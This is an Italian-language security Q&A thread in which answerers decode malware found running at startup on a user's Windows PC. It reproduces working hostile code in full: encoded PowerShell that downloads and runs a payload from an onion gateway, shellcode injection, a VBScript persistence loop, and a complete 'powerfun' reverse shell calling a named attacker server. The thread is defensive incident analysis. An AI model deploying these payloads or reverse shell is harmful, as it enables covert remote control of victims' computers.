Codice strano in esecuzione all'avvio

72

All'avvio era in esecuzione un pezzo di codice sulla mia macchina Windows. Mi piacerebbe sapere esattamente cosa sta facendo questo codice; sembra riferirsi a qualcosa come il crackbook?

@echo off  
if %PROCESSOR_ARCHITECTURE%==x86 ( START /B powershell -NoP -NonI -W Hidden -Exec Bypass -Enc WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0ACgBpAGUAeAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcABzADoALwAvAGwAYwAyADUAcQBqADIAZwBkAGMAYQBpAGQAYQByAGMALgBvAG4AaQBvAG4ALgB0AG8AOgA0ADQAMwAvAEwAZQBUAHIAVwBIAHoASQBxACIAKQAKAA== ) 
if %PROCESSOR_ARCHITECTURE%==AMD64( START /B %WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0ACgBpAGUAeAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcABzADoALwAvAGwAYwAyADUAcQBqADIAZwBkAGMAYQBpAGQAYQByAGMALgBvAG4AaQBvAG4ALgB0AG8AOgA0ADQAMwAvAEwAZQBUAHIAVwBIAHoASQBxACIAKQAKAA== )

EDIT : ho provato a formattare il mio PC. Sembra che uno spyware da prpops.com (NSFW) sia installato sul mio sistema senza alcun preavviso.

Il file di configurazione che era in uso sul mio PC è ancora lì anche dopo aver formattato il mio PC. Ecco un piccolo codice che viene eseguito tramite il file bat utilizzato per l'esecuzione.

Dim WinScriptHost 
WScript.Sleep(30000) 
Set WinScriptHost = CreateObject("WScript.Shell") 
WinScriptHost.Run Chr(34) & "%USERPROFILE%\appdata\file.bat" & Chr(34), 0 
While True 
set service = GetObject ("winmgmts:") 
running = 0 
for each Process in Service.InstancesOf ("Win32_Process") 
    If Process.Name = "powershell.exe" then 
        running = running + 1 
        End If 
next 
If running < 1 then 
    WinScriptHost.Run Chr(34) & "%USERPROFILE%\appdata\file.bat" & Chr(34), 0 
    End If 
WScript.Sleep(120000) 
Wend 
Set WinScriptHost = Nothing 

Indica se questo auto-scarica lo script o lo memorizza in qualsiasi modo nella memoria?

    
posta Aditya Giri 25.05.2017 - 19:02
fonte

3 risposte

106
 

Versione breve

L'utente malintenzionato può eseguire qualsiasi comando di PowerShell sulla macchina e può essere trovato assumendo il proprietario di " ec2-54-169-248-105.ap-southeast-1.compute.amazonaws.com ".

Versione lunga

Ho scaricato l'array binario in un file e l'ho caricato su VirusTotal .

Il file appena lanciato mi sembra uno stadio aggiuntivo poiché è molto piccolo (1,7 kb) e verrà eseguito per 10 secondi solo perché sarà associato a PowerShell (poiché l'utente malintenzionato crea una discussione anziché avviarla come un processo separato) e la terminazione viene ritardata di 10 secondi all'ultimo comando.

Aggiornamento: non sono purtroppo in grado di eseguire il reverse-engineer assembly, ma una rapida occhiata al file usando un editor di testo ha rivelato la seguente stringa:

powershell.exe -exec bypass -nop -W hidden -noninteractive IEX $(
$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(
'A really long base64 full code can be found below'));
IEX (New-Object IO.StreamReader(
New-Object IO.Compression.GzipStream($s,
[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();)

Tuttavia, questo stage utilizza anche GZIP come ulteriore livello di offuscamento su Base64, ma può ancora essere scaricato a:

# Powerfun - Written by Ben Turner & Dave Hardy

function Get-Webclient 
{
    $wc = New-Object -TypeName Net.WebClient
    $wc.UseDefaultCredentials = $true
    $wc.Proxy.Credentials = $wc.Credentials
    $wc
}
function powerfun 
{ 
    Param( 
    [String]$Command,
    [String]$Sslcon,
    [String]$Download
    ) 
    Process {
    $modules = @()  
    if ($Command -eq "bind")
    {
        $listener = [System.Net.Sockets.TcpListener]9999
        $listener.start()    
        $client = $listener.AcceptTcpClient()
    } 
    if ($Command -eq "reverse")
    {
    $client = New-Object  System.Net.Sockets.TCPClient("ec2-54-169-248-105.ap-southeast-1.compute.amazonaws.com",9999)
    }

    $stream = $client.GetStream()

    if ($Sslcon -eq "true") 
    {
        $sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
        $sslStream.AuthenticateAsClient("ec2-54-169-248-105.ap-southeast-1.compute.amazonaws.com") 
        $stream = $sslStream 
    }

    [byte[]]$bytes = 0..20000|%{0}
    $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "'nCopyright (C) 2015 Microsoft Corporation. All rights reserved.'n'n")
    $stream.Write($sendbytes,0,$sendbytes.Length)

    if ($Download -eq "true")
    {
        $sendbytes = ([text.encoding]::ASCII).GetBytes("[+] Loading modules.'n")
        $stream.Write($sendbytes,0,$sendbytes.Length)
        ForEach ($module in $modules)
        {
            (Get-Webclient).DownloadString($module)|Invoke-Expression
        }
    }

    $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
    $stream.Write($sendbytes,0,$sendbytes.Length)

    while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
    {
        $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
        $data = $EncodedText.GetString($bytes,0, $i)
        $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )

        $sendback2  = $sendback + 'PS ' + (Get-Location).Path + '> '
        $x = ($error[0] | Out-String)
        $error.clear()
        $sendback2 = $sendback2 + $x

        $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
        $stream.Write($sendbyte,0,$sendbyte.Length)
        $stream.Flush()  
    }
    $client.Close()
    $listener.Stop()
    }
}

powerfun -Command reverse -Sslcon true

Questa è una backdoor di PowerShell piuttosto semplice che si connette a un server e quindi consente all'utente malintenzionato di eseguire in remoto i comandi di PowerShell sul computer. Questo script "powerfun" può essere trovato su GitHub googiando due secondi quindi non lo collegherò qui per non allungare i limiti anti-spam. Tuttavia, confrontandolo con lo script originale, noterai subito che l'autore dell'attacco ha cambiato l'indirizzo del server remoto in " ec2-54-169-248-105.ap-southeast-1.compute.amazonaws.com "e la porta su 9999 , quindi dovrebbe essere facile tenere traccia dell'attaccante se necessario.

Infine: Il server sta ancora ascoltando quella porta, quindi è l'autore dell'attacco in grado di controllare il tuo computer!

    
risposta data 25.05.2017 - 23:03
fonte
43

Versione breve

La tua macchina è compromessa e l'utente malintenzionato controlla ancora il tuo computer.

Versione lunga

Decodificando l'espressione codificata base64 (la stringa passata nell'argomento -Enc ), ottieni il codice che viene eseguito da PowerShell:

[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
iex (New-Object Net.WebClient).DownloadString("https://lc25qj2gdcaidarc.onion.to:443/LeTrWHzIq")

Questo codice scarica fondamentalmente altro codice PowerShell da un servizio nascosto Tor (tramite il gateway onion.to , che consente di accedere ai servizi nascosti Tor da una macchina che non è connessa a Tor) ed esegue.

Ecco il codice che viene scaricato ed eseguito (ancora una volta, esecuzione in linea di uno script PowerShell codificato in base 64):

powershell -Enc [long base64 encoded string]

Che corrisponde al seguente codice una volta decodificato:

$c = @"
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z);
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z);
[DllImport("msvcrt.dll")] public static extern IntPtr memset(IntPtr x, uint y, uint z);
"@
$o = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru
$x = $o::VirtualAlloc(0, 0x1000, 0x3000, 0x40)
[Byte[]]$sc = 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x6a,0x01,0x8d,0x85,0xb2,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x53,0xff,0xd5,0x70,0x6f,0x77,0x65,0x72,0x73,0x68,0x65,0x6c,0x6c,0x2e,0x65,0x78,0x65,0x20,0x2d,0x65,0x78,0x65,0x63,0x20,0x62,0x79,0x70,0x61,0x73,0x73,0x20,0x2d,0x6e,0x6f,0x70,0x20,0x2d,0x57,0x20,0x68,0x69,0x64,0x64,0x65,0x6e,0x20,0x2d,0x6e,0x6f,0x6e,0x69,0x6e,0x74,0x65,0x72,0x61,0x63,0x74,0x69,0x76,0x65,0x20,0x49,0x45,0x58,0x20,0x24,0x28,0x24,0x73,0x3d,0x4e,0x65,0x77,0x2d,0x4f,0x62,0x6a,0x65,0x63,0x74,0x20,0x49,0x4f,0x2e,0x4d,0x65,0x6d,0x6f,0x72,0x79,0x53,0x74,0x72,0x65,0x61,0x6d,0x28,0x2c,0x5b,0x43,0x6f,0x6e,0x76,0x65,0x72,0x74,0x5d,0x3a,0x3a,0x46,0x72,0x6f,0x6d,0x42,0x61,0x73,0x65,0x36,0x34,0x53,0x74,0x72,0x69,0x6e,0x67,0x28,0x27,0x48,0x34,0x73,0x49,0x41,0x49,0x76,0x6d,0x79,0x56,0x67,0x43,0x41,0x36,0x56,0x57,0x62,0x57,0x2f,0x62,0x4e,0x68,0x44,0x2b,0x37,0x6c,0x39,0x78,0x63,0x4c,0x56,0x61,0x51,0x69,0x7a,0x43,0x4e,0x70,0x70,0x68,0x44,0x5a,0x42,0x69,0x72,0x70,0x4a,0x75,0x41,0x62,0x4c,0x57,0x71,0x4c,0x33,0x6c,0x67,0x32,0x45,0x67,0x74,0x48,0x53,0x4f,0x74,0x55,0x69,0x6b,0x53,0x31,0x4a,0x2b,0x57,0x65,0x4c,0x2f,0x58,0x6c,0x4b,0x69,0x58,0x68,0x77,0x6e,0x36,0x4c,0x4c,0x70,0x69,0x36,0x33,0x6a,0x33,0x63,0x50,0x6e,0x6e,0x6a,0x73,0x65,0x39,0x51,0x5a,0x47,0x66,0x49,0x4e,0x69,0x6b,0x54,0x48,0x77,0x34,0x55,0x62,0x45,0x53,0x69,0x47,0x44,0x2b,0x51,0x34,0x2b,0x36,0x70,0x39,0x4a,0x4a,0x68,0x67,0x4b,0x65,0x41,0x73,0x58,0x64,0x49,0x33,0x77,0x4f,0x78,0x58,0x52,0x72,0x74,0x58,0x53,0x6e,0x71,0x47,0x4b,0x4f,0x59,0x50,0x66,0x55,0x50,0x6b,0x33,0x4f,0x41,0x2b,0x54,0x47,0x4a,0x6d,0x43,0x31,0x6b,0x4d,0x4c,0x39,0x4f,0x4e,0x73,0x51,0x6a,0x69,0x48,0x7a,0x37,0x6a,0x78,0x76,0x38,0x7a,0x2f,0x78,0x6c,0x43,0x42,0x50,0x39,0x6d,0x74,0x38,0x44,0x4e,0x4e,0x55,0x52,0x73,0x56,0x30,0x66,0x35,0x42,0x37,0x6c,0x38,0x36,0x6b,0x7a,0x38,0x6c,0x58,0x75,0x43,0x43,0x5a,0x6f,0x6b,0x4b,0x42,0x45,0x5a,0x36,0x4a,0x61,0x61,0x4a,0x31,0x42,0x43,0x4f,0x45,0x68,0x6c,0x57,0x58,0x69,0x50,0x42,0x74,0x7a,0x76,0x79,0x78,0x45,0x50,0x62,0x47,0x35,0x62,0x53,0x74,0x37,0x57,0x76,0x4b,0x61,0x37,0x4b,0x31,0x46,0x6f,0x50,0x6b,0x4b,0x2b,0x50,0x71,0x4b,0x43,0x70,0x57,0x2f,0x79,0x66,0x6a,0x70,0x57,0x49,0x32,0x64,0x33,0x4d,0x43,0x58,0x69,0x61,0x55,0x68,0x5a,0x31,0x44,0x36,0x31,0x6a,0x6d,0x59,0x53,0x63,0x50,0x54,0x46,0x65,0x38,0x41,0x31,0x4c,0x4f,0x49,0x31,0x79,0x71,0x32,0x63,0x78,0x42,0x51,0x39,0x52,0x53,0x72,0x41,0x43,0x70,0x44,0x7a,0x4b,0x45,0x6a,0x51,0x45,0x66,0x33,0x55,0x39,0x4b,0x46,0x7a,0x69,0x42,0x62,0x6a,0x6c,0x4e,0x75,0x44,0x6a,0x4e,0x32,0x6a,0x50,0x59,0x78,0x61,0x31,0x76,0x58,0x79,0x78,0x69,0x4d,0x74,0x6a,0x6b,0x31,0x68,0x71,0x2b,0x62,0x58,0x6b,0x35,0x33,0x72,0x4c,0x6e,0x66,0x36,0x66,0x45,0x71,0x50,0x61,0x6d,0x49,0x66,0x33,0x71,0x43,0x53,0x5a,0x68,0x4b,0x74,0x72,0x36,0x7a,0x46,0x37,0x72,0x35,0x2f,0x6a,0x51,0x43,0x49,0x56,0x46,0x63,0x72,0x73,0x61,0x33,0x66,0x4f,0x56,0x32,0x32,0x4a,0x7a,0x68,0x74,0x2b,0x77,0x7a,0x44,0x45,0x6c,0x64,0x4b,0x41,0x52,0x54,0x6e,0x63,0x67,0x73,0x72,0x2b,0x4a,0x62,0x6f,0x43,0x31,0x79,0x67,0x6b,0x48,0x6a,0x4f,0x75,0x6f,0x42,0x73,0x6c,0x66,0x34,0x35,0x35,0x4d,0x4c,0x49,0x62,0x74,0x54,0x45,0x63,0x2b,0x4b,0x66,0x76,0x2f,0x50,0x37,0x50,0x37,0x2f,0x33,0x42,0x75,0x31,0x2f,0x38,0x66,0x75,0x2b,0x55,0x30,0x4a,0x55,0x76,0x65,0x61,0x61,0x57,0x53,0x4b,0x58,0x79,0x2b,0x79,0x54,0x6b,0x36,0x53,0x70,0x54,0x53,0x47,0x68,0x4b,0x2f,0x2b,0x47,0x4d,0x62,0x71,0x53,0x78,0x74,0x4c,0x73,0x6d,0x59,0x30,0x75,0x7a,0x56,0x55,0x67,0x74,0x6c,0x55,0x43,0x61,0x6d,0x72,0x77,0x4b,0x47,0x6b,0x53,0x33,0x35,0x44,0x69,0x33,0x36,0x58,0x7a,0x71,0x54,0x49,0x70,0x4b,0x46,0x6f,0x6d,0x59,0x72,0x6d,0x72,0x62,0x77,0x6a,0x58,0x53,0x6b,0x44,0x49,0x5a,0x6c,0x32,0x41,0x76,0x5a,0x49,0x4a,0x68,0x70,0x6b,0x2f,0x48,0x6a,0x6f,0x78,0x4c,0x56,0x39,0x66,0x75,0x33,0x33,0x55,0x57,0x75,0x76,0x32,0x77,0x36,0x7a,0x34,0x34,0x45,0x34,0x32,0x2b,0x42,0x35,0x39,0x4b,0x6d,0x42,0x37,0x45,0x66,0x4d,0x57,0x55,0x4b,0x77,0x78,0x51,0x71,0x48,0x67,0x52,0x68,0x31,0x54,0x68,0x58,0x7a,0x53,0x4a,0x49,0x32,0x70,0x36,0x4e,0x4b,0x42,0x4a,0x4d,0x71,0x66,0x68,0x2f,0x63,0x7a,0x7a,0x6e,0x71,0x46,0x44,0x68,0x6b,0x59,0x57,0x33,0x65,0x41,0x6d,0x61,0x43,0x6a,0x2f,0x72,0x34,0x5a,0x65,0x6f,0x79,0x6c,0x71,0x38,0x65,0x72,0x6b,0x6d,0x2b,0x70,0x4f,0x35,0x7a,0x75,0x46,0x30,0x39,0x6e,0x4d,0x4d,0x62,0x2b,0x6d,0x6e,0x58,0x75,0x45,0x44,0x48,0x72,0x36,0x65,0x66,0x7a,0x70,0x6f,0x62,0x65,0x33,0x42,0x55,0x41,0x57,0x6c,0x63,0x76,0x75,0x56,0x4f,0x46,0x57,0x45,0x57,0x51,0x68,0x6a,0x38,0x78,0x5a,0x4f,0x54,0x73,0x62,0x6a,0x6f,0x4f,0x72,0x4b,0x38,0x38,0x55,0x35,0x61,0x50,0x78,0x63,0x64,0x73,0x33,0x75,0x75,0x6e,0x35,0x52,0x68,0x59,0x54,0x5a,0x37,0x7a,0x45,0x4a,0x41,0x47,0x52,0x4d,0x61,0x61,0x39,0x51,0x55,0x75,0x57,0x53,0x64,0x33,0x34,0x62,0x54,0x67,0x42,0x42,0x39,0x6e,0x36,0x7a,0x4c,0x77,0x78,0x4d,0x7a,0x5a,0x4f,0x74,0x45,0x31,0x58,0x72,0x31,0x71,0x77,0x6d,0x56,0x57,0x4c,0x74,0x79,0x7a,0x67,0x71,0x35,0x32,0x49,0x37,0x35,0x59,0x4b,0x33,0x4d,0x43,0x44,0x51,0x61,0x39,0x2f,0x43,0x6e,0x2f,0x45,0x6f,0x65,0x43,0x53,0x4c,0x78,0x51,0x45,0x58,0x4b,0x79,0x34,0x79,0x4b,0x55,0x6d,0x4d,0x44,0x51,0x37,0x47,0x6b,0x38,0x4a,0x41,0x76,0x55,0x47,0x61,0x34,0x7a,0x49,0x4c,0x62,0x74,0x6c,0x74,0x71,0x2b,0x74,0x4a,0x73,0x53,0x4d,0x51,0x58,0x54,0x72,0x37,0x4c,0x71,0x39,0x62,0x76,0x31,0x43,0x72,0x70,0x48,0x64,0x71,0x57,0x57,0x7a,0x77,0x63,0x71,0x70,0x30,0x47,0x79,0x78,0x6f,0x77,0x35,0x37,0x6e,0x56,0x54,0x54,0x6b,0x78,0x6c,0x63,0x61,0x30,0x69,0x6a,0x6a,0x5a,0x30,0x6f,0x70,0x4f,0x4c,0x35,0x65,0x71,0x35,0x6c,0x31,0x43,0x63,0x75,0x4c,0x6d,0x6d,0x34,0x31,0x4a,0x77,0x4c,0x55,0x49,0x68,0x5a,0x4e,0x62,0x46,0x71,0x72,0x35,0x71,0x32,0x65,0x64,0x79,0x44,0x51,0x65,0x2b,0x52,0x4d,0x74,0x74,0x69,0x4a,0x70,0x5a,0x49,0x33,0x75,0x4d,0x56,0x57,0x2f,0x4e,0x37,0x39,0x43,0x2b,0x33,0x4b,0x36,0x32,0x74,0x31,0x48,0x70,0x58,0x4b,0x50,0x76,0x44,0x55,0x2f,0x73,0x71,0x4a,0x54,0x71,0x6a,0x4d,0x58,0x52,0x30,0x6e,0x58,0x4d,0x57,0x31,0x7a,0x7a,0x4d,0x4b,0x2b,0x6d,0x52,0x45,0x56,0x56,0x4c,0x62,0x65,0x31,0x38,0x36,0x50,0x7a,0x6e,0x30,0x6d,0x32,0x57,0x63,0x59,0x4b,0x75,0x36,0x38,0x54,0x35,0x47,0x53,0x6a,0x43,0x76,0x79,0x4b,0x4e,0x33,0x4b,0x4c,0x6a,0x75,0x39,0x44,0x72,0x67,0x6e,0x4d,0x51,0x35,0x34,0x48,0x50,0x45,0x48,0x70,0x48,0x74,0x62,0x30,0x30,0x39,0x44,0x47,0x61,0x36,0x46,0x52,0x65,0x75,0x76,0x7a,0x73,0x4a,0x44,0x45,0x75,0x4a,0x45,0x2f,0x78,0x30,0x71,0x5a,0x63,0x6f,0x2b,0x68,0x35,0x51,0x41,0x32,0x56,0x42,0x70,0x6f,0x64,0x61,0x4c,0x6e,0x4d,0x5a,0x54,0x72,0x67,0x78,0x4e,0x36,0x54,0x74,0x74,0x4c,0x6a,0x77,0x32,0x68,0x35,0x56,0x41,0x44,0x77,0x79,0x79,0x46,0x65,0x67,0x41,0x38,0x2b,0x76,0x4f,0x33,0x44,0x49,0x33,0x7a,0x4a,0x6c,0x46,0x2b,0x67,0x67,0x70,0x58,0x69,0x41,0x47,0x6f,0x41,0x75,0x53,0x41,0x6c,0x73,0x42,0x62,0x35,0x42,0x79,0x57,0x41,0x54,0x67,0x32,0x79,0x4e,0x55,0x51,0x63,0x46,0x49,0x4b,0x4c,0x61,0x57,0x39,0x32,0x73,0x46,0x6d,0x44,0x64,0x62,0x35,0x4f,0x77,0x67,0x53,0x70,0x63,0x4c,0x33,0x6e,0x47,0x4a,0x77,0x33,0x58,0x2f,0x54,0x42,0x33,0x37,0x61,0x4f,0x54,0x39,0x4b,0x2f,0x61,0x70,0x38,0x61,0x35,0x6f,0x64,0x48,0x70,0x39,0x6b,0x71,0x52,0x77,0x65,0x6e,0x6a,0x50,0x6d,0x55,0x5a,0x48,0x4a,0x5a,0x33,0x65,0x74,0x32,0x44,0x4e,0x72,0x62,0x4a,0x30,0x69,0x34,0x52,0x4a,0x74,0x50,0x66,0x64,0x4f,0x4f,0x46,0x56,0x2b,0x56,0x31,0x36,0x76,0x2b,0x4e,0x6d,0x6c,0x56,0x33,0x79,0x52,0x56,0x63,0x65,0x7a,0x6c,0x43,0x72,0x36,0x39,0x71,0x4d,0x77,0x41,0x2b,0x51,0x36,0x63,0x4f,0x36,0x39,0x6e,0x6c,0x77,0x6b,0x41,0x41,0x41,0x3d,0x3d,0x27,0x29,0x29,0x3b,0x49,0x45,0x58,0x20,0x28,0x4e,0x65,0x77,0x2d,0x4f,0x62,0x6a,0x65,0x63,0x74,0x20,0x49,0x4f,0x2e,0x53,0x74,0x72,0x65,0x61,0x6d,0x52,0x65,0x61,0x64,0x65,0x72,0x28,0x4e,0x65,0x77,0x2d,0x4f,0x62,0x6a,0x65,0x63,0x74,0x20,0x49,0x4f,0x2e,0x43,0x6f,0x6d,0x70,0x72,0x65,0x73,0x73,0x69,0x6f,0x6e,0x2e,0x47,0x7a,0x69,0x70,0x53,0x74,0x72,0x65,0x61,0x6d,0x28,0x24,0x73,0x2c,0x5b,0x49,0x4f,0x2e,0x43,0x6f,0x6d,0x70,0x72,0x65,0x73,0x73,0x69,0x6f,0x6e,0x2e,0x43,0x6f,0x6d,0x70,0x72,0x65,0x73,0x73,0x69,0x6f,0x6e,0x4d,0x6f,0x64,0x65,0x5d,0x3a,0x3a,0x44,0x65,0x63,0x6f,0x6d,0x70,0x72,0x65,0x73,0x73,0x29,0x29,0x29,0x2e,0x52,0x65,0x61,0x64,0x54,0x6f,0x45,0x6e,0x64,0x28,0x29,0x3b,0x29,0x00
for ($i=0; $i -le ($sc.Length-1); $i++) {
    $o::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1) | out-null
}
$z = $o::CreateThread(0, 0, $x, 0, 0, 0)
Start-Sleep -Second 100000

Da quanto ho capito, questo codice importa DLL di sistema e quindi esegue un codice nativo (l'array di byte lunghi sulla riga 8).

Per approfondire, è possibile ricostruire il codice nativo dall'array di byte e inviarlo a VirusTotal per cercare di identificare quale malware sia o eseguire direttamente lo script di PowerShell in una sandbox per analizzare dinamicamente il suo comportamento.

EDIT: un'analisi di quest'ultima parte è disponibile nella risposta di VincBreaker .

    
risposta data 25.05.2017 - 20:20
fonte
10

È in esecuzione uno script PowerShell con codice Powershell codificato Base64.

Questo è il codice Powershell decodificato in esecuzione:

[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
iex (New-Object Net.WebClient).DownloadString("https://lc25qj2gdcaidarc.onion.to:443/LeTrWHzIq")

Quindi questo script sta scaricando e invocando il contenuto da https://lc25qj2gdcaidarc.onion.to:443/LeTrWHzIq

Ti permetterò di approfondire, dato che sono cauto nel navigare verso un link potenzialmente dannoso. Soprattutto perché proviene da * .onion.to, un indirizzo TOR.

    
risposta data 25.05.2017 - 19:11
fonte

Leggi altre domande sui tag